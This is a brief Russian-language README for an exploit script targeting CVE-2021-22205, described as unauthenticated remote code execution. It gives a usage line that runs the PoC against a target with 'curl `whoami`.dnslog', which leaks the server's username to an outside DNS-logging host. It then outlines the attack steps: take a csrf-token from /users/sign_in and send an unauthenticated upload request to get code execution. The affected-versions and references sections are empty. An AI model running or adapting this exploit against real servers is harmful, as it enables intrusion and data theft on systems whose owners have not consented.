
CVE-2021-22205 Несанкционированный RCE
Затронутые версии:
Использование
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"

Получение csrf-token:

Через /users/sign_in получаем csrf-token, затем с помощью предыдущего CVE-2021-22205 poc формируем пакет для загрузки и выполняем неаутентифицированный запрос на загрузку, в итоге получаем rce.


Ссылки: